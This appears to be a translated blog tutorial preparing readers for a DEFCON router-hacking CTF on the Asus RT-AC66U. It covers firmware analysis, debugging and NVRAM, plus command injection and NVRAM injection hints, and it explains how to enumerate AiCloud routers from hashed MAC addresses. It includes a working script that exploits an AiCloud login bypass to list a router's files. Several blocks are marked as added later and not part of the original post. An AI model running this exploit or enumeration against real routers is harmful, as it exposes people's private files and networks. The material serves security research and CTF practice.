
Break open Asus RT-AC66U and prepare for SOHOpelesslyBroken CTF

July is finally here, and it's time to gather at DEFCON. Follow @defconparties on Twitter to decide which places to visit and which talks to attend.

This year there is a new competition - SOHOpelesslyBroken, from ISE and EFF. The goal of Track 0 is to demonstrate previously unknown vulnerabilities in home wireless routers. Track 1 is held in CTF mode right during DEFCON. CTFs are always a lot of fun, and this one involves breaking into real hardware, which is doubly fun!

[Photo: the author's workbench] Yeah, this is my workplace =P
I am very interested in the EFF Open Wireless Router (the translator is too, by the way), but nothing has been published about the device yet. The competition rules list the ASUS RT-AC66U (HW Ver. A2) [Version 3.0.0.4.266] as one possible target. I have a spare RT-AC66U at home, so I decided to write a small tutorial for everyone taking part in the CTF.

Reconnaissance

First of all, you need to find the firmware and its source code. Fortunately, the Asus RT-AC66U firmware is GPL-licensed, and its source code is easy to find on the Internet. The version used in the CTF is old, from 2012. To analyze the firmware better, we will take the firmware and source code of both v3.0.0.4.266 and v3.0.0.4.376.1123 (the latest version at the time of writing):

Asus RT-AC66u v3.0.0.4.266 - firmware
Asus RT-AC66u v3.0.0.4.266 - source code
Asus RT-AC66u v3.0.0.4.376.1123 - firmware
Asus RT-AC66u v3.0.0.4.376.1123 - source code

Several firmware updates were released between these two versions, so the changelog is worth reading:
www.asus.com/Networking/RTAC66U/HelpDesk_Download

According to the competition rules, we must find and exploit a 0-day vulnerability. You can chain several different vulnerabilities to score more points. If the vendor silently patched a vulnerability without reporting it, and you were able to exploit it, it still counts as a 0-day (let's not argue about terminology).

So, we have the source code; it's time to unpack and examine it. The CTF Field Guide from Trail of Bits has good resources on source code auditing. You can use tools like Beyond Compare, Araxis Merge and WinMerge on Windows, or Meld if you are on Linux.
We will work in the "/asuswrt/release/src/router/" directory. Compare the two versions in Meld:


Many vulnerabilities have already been found in this router. If you want to find a 0-day, you have to make sure nobody has found the vulnerability before you (and believe me, this is the hardest part). As an example:

You lose points if your exploit requires a non-default system configuration or special information. So, if you want to score a lot of points, aim at the default configuration of services and processes.


In the “USB Applications” tab in RT-AC66U, you can configure some services, such as FTP, DLNA, NFS, and Samba.


MiniDLNA is also a great target. Finding vulnerabilities in it is easier with Zachary Cutlip's research, since he has broken this program several times over.


Another potentially vulnerable service is AiCloud - it exposes your home network storage online and gives access to it from mobile devices:


Forensics

While part of the team examines the source code, the forensics people unpack the firmware with binwalk and FMK (firmware-mod-kit):


You may remember binwally, a utility I wrote to diff two binary trees using fuzzy hashing. Binwalk has its own option for fuzzy-hash comparison of files and directories.


Most manufacturers (Asus included) do not release the entire source. You will probably have to reverse the drivers and binaries to find a good vulnerability. The binary named "ACSD" is the most interesting one, because it was removed from newer firmware versions (v3.0.0.4.374.130+) due to a vulnerability found by Jacob Holcomb.


The binary is MIPS little-endian.


It is also important to learn more about the file system. The OpenWRT Wiki has a great article about the flash layout. MTD in Linux gives access to flash devices and allows full-fledged file systems to be created on them. You can SSH into the device and look at the partition layout:


The NVRAM partition is very valuable to us: it stores all the device settings. You can dump its contents either by reading the corresponding partition (mtd1) directly or by running the nvram show command:




Pmon is another interesting partition. It contains LZMA-compressed data that the bootloader uses to restore the firmware when an update fails.




Breaking in

Time to start hacking something. To debug binaries we need tools like gdb, gdbserver and strace. We can either cross-compile them, or set up Optware/Entware and install the prebuilt packages.


Wanduck (GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/rc/wanduck.c) is quite an interesting process to analyze. It runs by default and starts a pseudo-HTTP server on port 18017. This HTTP server redirects every request to the main interface and, for some reason, drops all requests ending in ".ico".


Let's see why it does this: run gdbserver on the router (gdbserver --multi localhost:12345 &) and connect with the debugger of your choice. If you are using IDA Pro, open the binary and set the processor type to "mipsrl".


Find the function handle_http_req and set a breakpoint on the dst_url comparison:


Enter the gdbserver host and port in the Debugger / Process Options menu and attach to the desired PID.




Continue the process (F9) and issue an HTTP request to 192.168.1.1/x.ico. The debugger stops at the breakpoint and you can inspect the registers and memory.


If you want other targets for research, look in the "prebuilt" directory inside "GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/". Some interesting binaries:

The AiCloud mobile application can reveal more interesting information about how the device works. If you decompile the APK, or use an intercepting proxy, you can capture the application's initial HTTP request:






Notice the strange ddns_hostname parameter? A cryptography puzzle =) (the translator disagrees).

Cryptography

The POST request tries to register a new Dynamic DNS address for the device with the asuscomm.com service. If we search for this string in the RT-AC66U source code, we easily find the function that generates the DDNS address:

    var isMD5DDNSName = function(){
        var macAddr = '<% nvram_get("lan_hwaddr"); %>'.toUpperCase().replace(/:/g, "");
        return "A" + hexMD5(macAddr).toUpperCase() + ".asuscomm.com";
    }


According to WikiDev, the RT-AC66U uses the following OUIs (organizationally unique identifiers) in its MAC addresses:


Using this information, we can resolve the IP address of every router that uses AiCloud: just generate the list of all possible MAC addresses and resolve the DNS names with mubix's trick.
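The hostname derivation above, as an added Python example (not code from the original post or from Asus): it mirrors the isMD5DDNSName() logic, and the candidate_count() function shows why hashing a MAC with a known OUI gives no secrecy, since only the 24 NIC bits vary. The OUIs in EXAMPLE_OUIS are placeholders, because the post's own OUI table is in an image; ddns_owner() is the defender-side use, mapping a hostname seen in logs back to one of your own devices.

```python
import hashlib

# OUIs here are placeholders for this example; the post's own table of
# RT-AC66U OUIs (from WikiDev) is in an image that did not survive.
EXAMPLE_OUIS = ["00:11:22", "AA:BB:CC"]


def ddns_name(mac):
    """Python mirror of the isMD5DDNSName() logic from the web UI:
    uppercase the LAN MAC, strip the colons, MD5 it, prefix 'A' and
    append .asuscomm.com. Deterministic: same MAC, same hostname."""
    mac_hex = mac.upper().replace(":", "")
    if len(mac_hex) != 12 or any(c not in "0123456789ABCDEF" for c in mac_hex):
        raise ValueError("not a MAC address: %r" % mac)
    digest = hashlib.md5(mac_hex.encode("ascii")).hexdigest().upper()
    return "A" + digest + ".asuscomm.com"


def names_per_oui():
    """Hostnames derivable from one OUI: 24 free NIC bits, so 2**24."""
    return 2 ** 24


def candidate_count(ouis):
    """Total hostnames that have to be tried for these OUIs; the point is
    that MD5 adds no secrecy here, only a fixed cost per guess."""
    return len(ouis) * names_per_oui()


def ddns_owner(hostname, candidate_macs):
    """Defender-side use: given a hostname seen in DNS or web logs and
    the MACs of your own devices, find which device it belongs to."""
    for mac in candidate_macs:
        if ddns_name(mac) == hostname:
            return mac
    return None
```

With two OUIs the candidate space is 2 * 2**24 = 33,554,432 names, which is the whole "secret" the MD5 step protects.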


If you are too lazy to run a command, you can just search for "asuscomm.com" on Shodan.


AiCloud runs by default on ports 8082 and 443. The fact that anyone can easily obtain a list of routers running this service should be a concern, right?

Another interesting cryptographic warm-up is reversing the algorithm that generates the device's WPS PIN. You can get the current PIN and secret_code by running nvram show | grep -E "secret_code|wps_device_pin". Look for these values in the source code and use what you find to write keygens (and don't forget to add a chiptune from pouet.net).




You can also check the entropy of the keys generated on the device. Look at the "Fast Internet-wide Scanning and its Security Applications" slides for a couple of ideas.
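An added Python example for the WPS PIN and entropy points above (not code from the original post; Asus's own PIN generation algorithm is not reproduced here). It implements the checksum digit that the WPS specification defines for the eighth digit of a PIN, so a value read from wps_device_pin can be sanity-checked, and it makes the entropy point concrete: the eighth digit is derived, so an 8-digit PIN carries at most seven digits of entropy.

```python
def wps_checksum(first_seven):
    """Checksum digit from the WPS specification: the seven leading digits
    are weighted 3,1,3,1,... starting from the rightmost one, and the
    eighth digit makes the weighted sum a multiple of 10."""
    if not 0 <= first_seven <= 9999999:
        raise ValueError("expected a value of at most seven digits")
    accum = 0
    n = first_seven
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin):
    """True if pin is an 8-digit string whose last digit is the correct
    checksum. Use it to sanity-check what nvram reports as wps_device_pin."""
    if not (isinstance(pin, str) and len(pin) == 8 and pin.isdigit()):
        return False
    return int(pin[7]) == wps_checksum(int(pin[:7]))


def effective_pin_space():
    """The checksum is derived, so an 8-digit PIN has 7 digits of entropy
    at most: 10**7 candidates, not 10**8."""
    return 10 ** 7
```

The well-known example PIN 12345670 validates (checksum digit 0), while 12345671 does not; any generator whose seven leading digits are predictable from other device data reduces the space further, which is exactly what the keygen exercise above is about.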


Web

There are so many web penetration testing techniques that I will focus on only a couple of them. The router interface has no CSRF protection. There is also the traditional command injection in the ping function and a bunch of XSS vectors.

The HTTP daemon is based on micro_httpd. There is basic protection against directory traversal in httpd.c:



We can shamelessly borrow hackerfantastic's idea and test a potential bypass of this protection with a small harness that applies the same checks to a command-line argument:

    #include <stdio.h>
    #include <string.h>

    /* Reproduces the httpd.c filename check on argv[1]. */
    int main(int argc, char *argv[])
    {
        char *file;
        int len;

        if (argc < 2) {
            fprintf(stderr, "usage: %s <filename>\n", argv[0]);
            return 1;
        }
        file = argv[1];
        len = strlen(file);
        /* note: for len < 3, &file[len-3] points before the buffer, as in httpd.c */
        if (file[0] == '/'
            || strcmp(file, "..") == 0
            || strncmp(file, "../", 3) == 0
            || strstr(file, "/../") != (char *) 0
            || strcmp(&(file[len - 3]), "/..") == 0) {
            printf("Illegal filename: %s\n", file);
        } else {
            printf("Accepted filename: %s\n", file);
        }
        return 0;
    }
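An added Python example (not from the original post or from httpd.c) that puts the check above beside a canonicalising version. legacy_filename_check() applies the five string conditions exactly as written; is_within_docroot() percent-decodes, joins to the document root, normalises and requires the result to stay under the root. Whether httpd.c decodes the path before running its check is not shown on this page, so the decoding step here is an assumption about where such a check should sit, not a claim about the router.

```python
import posixpath
from urllib.parse import unquote


def legacy_filename_check(name):
    """Python rendering of the five conditions from httpd.c, applied to
    the string exactly as given. The C version indexes file[len-3]
    without checking len, which reads before the buffer for names shorter
    than three bytes; that case is guarded here."""
    if name.startswith("/"):
        return False
    if name == ".." or name.startswith("../"):
        return False
    if "/../" in name:
        return False
    if len(name) >= 3 and name.endswith("/.."):
        return False
    return True


def is_within_docroot(docroot, name):
    """Canonicalise first, then decide: percent-decode, join to the
    document root, normalise lexically and require the result to stay
    under the root. Symlinks are not covered; resolve with
    os.path.realpath against the real filesystem at serve time."""
    root = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(root, unquote(name)))
    return candidate == root or candidate.startswith(root + "/")


def audit(names, docroot="/www"):
    """Run both checks over a list of request paths; each entry maps to
    (accepted by the legacy check, accepted by the canonical check)."""
    return {n: (legacy_filename_check(n), is_within_docroot(docroot, n))
            for n in names}
```

The interesting rows of audit() are the ones where the two columns disagree: a string that contains no literal "../" passes the legacy check but, once decoded and normalised, lands outside the root.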




There are some MIME handlers in the web server that "should have been removed":

    // some should be removed
    struct except_mime_handler except_mime_handlers[] = {
        { "QIS_*", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "qis/*", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "*.css", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "state.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "detect.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "popup.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "general.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "help.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "start_autodet.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "start_apply.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "start_apply2.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "setting_lan.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "httpd_check.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "status.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "automac.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "detecWAN.asp", MIME_EXCEPTION_NORESETTIME},
        { "detecWAN2.asp", MIME_EXCEPTION_NORESETTIME},
        { "WPS_info.asp", MIME_EXCEPTION_NORESETTIME},
        { "WAN_info.asp", MIME_EXCEPTION_NOAUTH_ALL|MIME_EXCEPTION_NORESETTIME},
        { "result_of_get_changed_status.asp", MIME_EXCEPTION_NORESETTIME},
        { "result_of_get_changed_status_QIS.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
        { "result_of_detect_client.asp", MIME_EXCEPTION_NORESETTIME},
        { "Nologin.asp", MIME_EXCEPTION_NOAUTH_ALL},
        { "alertImg.gif", MIME_EXCEPTION_NOAUTH_ALL},
        { "error_page.htm", MIME_EXCEPTION_NOAUTH_ALL},
        { "jquery.js", MIME_EXCEPTION_NOAUTH_ALL},
        { "gotoHomePage.htm", MIME_EXCEPTION_NOAUTH_ALL},
        { "update_appstate.asp", MIME_EXCEPTION_NOAUTH_ALL},
        { "update_cloudstatus.asp", MIME_EXCEPTION_NOAUTH_ALL},
        { "get_webdavInfo.asp", MIME_EXCEPTION_NOAUTH_ALL},
        { "*.gz", MIME_EXCEPTION_NOAUTH_ALL},
        { "*.tgz", MIME_EXCEPTION_NOAUTH_ALL},
        { "*.zip", MIME_EXCEPTION_NOAUTH_ALL},
        { "*.ipk", MIME_EXCEPTION_NOAUTH_ALL},
        { NULL, 0 }
    };


The file get_webdavInfo.asp is accessible without authentication and exposes a large amount of sensitive information about the device and the network:
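An added Python example (not from the original post or from httpd.c) for auditing a table like the one above: given a subset of the entries in their original order, it answers which request paths are exempt from authentication entirely. The flag bit values, the glob matching and the first-match-wins walk are assumptions about how httpd consults the table; the pattern shapes "QIS_*" and "*.css" suggest globbing, and MIME_EXCEPTION_NOAUTH_FIRST presumably applies only during initial setup.

```python
import fnmatch

# Flag bits are placeholders for this example; httpd.c defines the real
# MIME_EXCEPTION_* values.
NOAUTH_FIRST = 1 << 0
NORESETTIME = 1 << 1
NOAUTH_ALL = 1 << 2

# A subset of the except_mime_handlers[] entries quoted above, in the
# same order; the full table has many more rows.
EXCEPT_MIME_HANDLERS = [
    ("QIS_*", NOAUTH_FIRST | NORESETTIME),
    ("*.css", NOAUTH_FIRST | NORESETTIME),
    ("WAN_info.asp", NOAUTH_ALL | NORESETTIME),
    ("Nologin.asp", NOAUTH_ALL),
    ("get_webdavInfo.asp", NOAUTH_ALL),
    ("*.gz", NOAUTH_ALL),
    ("*.tgz", NOAUTH_ALL),
    ("*.zip", NOAUTH_ALL),
    ("*.ipk", NOAUTH_ALL),
]


def matching_flags(path):
    """Flags of the first entry whose pattern matches the request path.
    Glob semantics and first-match-wins are assumptions about how httpd
    walks the table; anything unmatched gets 0 (normal authentication)."""
    for pattern, flags in EXCEPT_MIME_HANDLERS:
        if fnmatch.fnmatchcase(path, pattern):
            return flags
    return 0


def reachable_unauthenticated(paths):
    """Request paths the table exempts from authentication entirely
    (NOAUTH_ALL), as opposed to NOAUTH_FIRST, which presumably only
    applies before the first setup is completed."""
    return [p for p in paths if matching_flags(p) & NOAUTH_ALL]
```

Running reachable_unauthenticated() over the file names in the www directory is a quick way to enumerate the unauthenticated surface before diffing it between firmware versions; note that the wildcard rows make every .gz, .tgz, .zip and .ipk file in the web root reachable, not just the ones the author had in mind.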


We can change the values of variables in NVRAM to plant a persistent XSS on this page, for example:


Some operations read settings through the nvram_get and nvram_safe_get functions, and settings are saved through nvram_set. If the router does not sanitize the data it reads back from NVRAM, you can do something like NVRAM injection (%0A, %0D and `reboot` will always be your helpers in this matter).
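An added Python example (not from the original post) that serves the NVRAM dump mentioned in the Forensics section and the injection point above: it parses `nvram show` output, treats a line without "=" as the continuation of the previous value (which is how an injected newline shows up in the dump), and applies the two checks a defender wants before a value reaches a shell command or a page such as get_webdavInfo.asp. The sample dump is constructed for this example; none of its values come from a real device.

```python
import html
import re

# Constructed sample of `nvram show` output for this example (not captured
# from a device); every value below is invented for illustration.
SAMPLE_NVRAM_SHOW = """\
lan_hwaddr=00:11:22:33:44:55
lan_ipaddr=192.168.1.1
computer_name=RT-AC66U
wan_hostname=router<script>alert(1)</script>
ntp_server0=pool.ntp.org
`reboot`
webdav_user=admin
"""

# Conservative character set for values that end up inside a shell
# command line (hostnames, NTP servers, MAC addresses). CR, LF, backticks,
# $(), quotes, ';' and '|' are all outside it; an empty value is allowed.
SHELL_SAFE = re.compile(r"[A-Za-z0-9._:-]*")


def parse_nvram_show(text):
    """Parse key=value lines from `nvram show`. A line without '=' is the
    continuation of the previous value: that is how a newline injected
    into a setting (%0A/%0D in the request) shows up in the dump."""
    variables = {}
    last_key = None
    for line in text.split("\n"):
        if not line:
            continue
        if "=" in line:
            key, _, value = line.partition("=")
            variables[key] = value
            last_key = key
        elif last_key is not None:
            variables[last_key] += "\n" + line
    return variables


def safe_for_shell(value):
    """True only if the whole value consists of shell-safe characters."""
    return SHELL_SAFE.fullmatch(value) is not None


def render_html(value):
    """Escape a NVRAM value before it is written into a page such as
    get_webdavInfo.asp, so stored markup cannot execute in the browser."""
    return html.escape(value, quote=True)


def suspicious_values(variables):
    """Names of variables whose value could not be passed to a shell
    unchanged; the first thing to review after dumping NVRAM."""
    return sorted(k for k, v in variables.items() if not safe_for_shell(v))
```

On the sample dump, suspicious_values() flags ntp_server0 (newline plus backticks) and wan_hostname (markup); the fix on the firmware side is the same whitelist at nvram_set time, and escaping at render time for anything that is shown back in the UI.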

AiCloud is a very vulnerable service that is easy to exploit. As soon as you enable it in the settings, lighttpd starts on the router on port 8082 (or 443 on newer firmware versions) and offers access to your files online. The funny part is that the login dialog can be bypassed by adding /smb/ to the URL (read the source!)




I wrote a small script that uses this bug in AiCloud on RT-AC66U v3.0.0.4.266. It lists all files and paths on the router, including those on USB devices.

    #!/usr/bin/python
    # Python 2 script (urllib2, print statement).
    from bs4 import BeautifulSoup
    import urllib2
    import sys


    def list_dir(url, start_dir):
        # Fetch one directory listing and recurse into subdirectories.
        try:
            html_page = urllib2.urlopen(url + start_dir)
        except urllib2.HTTPError as e:
            print e
            sys.exit(1)
        soup = BeautifulSoup(html_page)
        for link in soup.findAll('a'):
            path = link.get('uhref')
            if path != '../':
                is_dir = link.get('isdir')
                if is_dir == '1':
                    print url + path
                    list_dir(url, path)
                else:
                    print url + path


    nargs = len(sys.argv)
    if nargs == 2:
        url = sys.argv[1]
        start_dir = "/smb"
    elif nargs == 3:
        url = sys.argv[1]
        start_dir = str(sys.argv[2])
    else:
        print ('Asus RT-AC66U AiCloud Unauthenticated File Disclosure\n'
               'Tested Firmwares: 3.0.0.4.266, 3.0.0.4.270 and 3.0.0.4.354\n'
               'Disclosed by Kyle Lovett\n'
               'Script by Bernardo Rodrigues - http://w00tsec.blogspot.com\n'
               'Usage: python %s http://url [path]' % sys.argv[0])
        sys.exit(1)
    list_dir(url, start_dir)





And finally, don't forget to diff the files in the www directory. That is where all the components and scripts used by the web interface live.


Bonus

Why not try to open the router's case without damaging the warranty seal? For that, you will want advice from the folks at the DEFCON Tamper Evident Village.



Miscellaneous (a sort of conclusion)

Hacking the Asus RT-AC66U is a great exercise for newcomers to router hacking. Most of the source code is freely available, and you can find a bunch of exploits and vulnerability writeups for it. You may not have noticed, but we touched on every item of the OWASP Internet of Things Top 10. Rumor has it that this router will be part of the base platform for OWASP IoT WebGoat and Damn Vulnerable Embedded Linux.

Here are a couple of approaches that can earn you extra points in the competition:

There are a lot more things I want to write about, but I'll save them for the next posts. If you intend to take part in the SOHOpelessly Broken CTF and found this article useful, feel free to ping me and have a coffee with me during DEFCON / BSidesLV / Black Hat =)

Source: https://habr.com/ru/post/230469/

